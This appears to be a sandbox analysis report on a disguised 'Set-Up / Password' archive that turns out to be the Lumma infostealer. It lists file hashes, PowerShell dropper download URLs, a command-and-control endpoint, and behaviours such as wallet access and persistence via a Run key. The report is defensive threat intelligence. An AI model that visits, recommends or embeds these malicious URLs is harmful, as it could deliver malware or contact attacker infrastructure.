Resubmissions

13-11-2024 20:41

241113-zgjjzayjay 10

13-11-2024 20:38

241113-ze8fbaskej 7

General

  • Target

    #Set-Uρ__9571--P𝐚SS̤̊w0rD̼S!!# (9571).zip

  • Size

    5.7MB

  • Sample

    241113-zgjjzayjay

  • MD5

    ed1ba2d2ef2defc75f970cd53224d9f6

  • SHA1

    062438459a1989bcfffa3779cf6451aaf107743e

  • SHA256

    e3f091c26b500cc71b761c4608a7d466cacf75d0a9d982c2fefa539bb2b96362

  • SHA512

    765c5285e89771c91e31612dbe8102b15b7af5bee18198b92bb1b6c58d968de7c6204107fa819dd098e6b2fc2d86f9e1bf811ae12226311c0af5e23d6481eca1

  • SSDEEP

    98304:HH4e2PdHzJmI6Velw3O8IaGQaT9RPDaFUpfpYEM1tAzAAg2q1BDWfm41A6bvdOgH:4eudQI6VelmEqav7aF4M1uYye41A6rhH

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://mindfusteps.shop/minz/m4nd.zip

exe.dropper

https://mindfusteps.shop/minz/m2nd.zip

exe.dropper

https://mindfusteps.shop/minz/m3nd.zip

exe.dropper

https://mindfusteps.shop/minz/m1nd.zip

exe.dropper

https://mindfusteps.shop/mind/

Extracted

Family

lumma

C2

https://pixelstory.shop/api

Targets

    • Target

      !Set-𝙐p_9571--PaṨ𝚂𝚆0rᎠ𝒮S#.rar

    • Size

      5.7MB

    • MD5

      187384d2980886e47bc6b18868b5b843

    • SHA1

      fc8d27ebe873ddd351da0a23ff4a9dbfb3da1b60

    • SHA256

      b98af4a6a58a4a1baed6fa1e649ae3a54e686e4ab4d792d94eb0cce77bed25ff

    • SHA512

      cdf5640dea2e8a92508fdee3fffb3443aa4570756fd02e51d9335443851015f93635d4193971ca113d28e104ab227626d72b499a0cd1ad5d326c9e54548efae9

    • SSDEEP

      98304:1H4e2PdHzJmI6Velw3O8IaGQaT9RPDaFUpfpYEM1tAzAAg2q1BDWfm41A6bvdOgp:ieudQI6VelmEqav7aF4M1uYye41A6rhp

    • Lumma Stealer, LummaC

      Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    • Lumma family

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks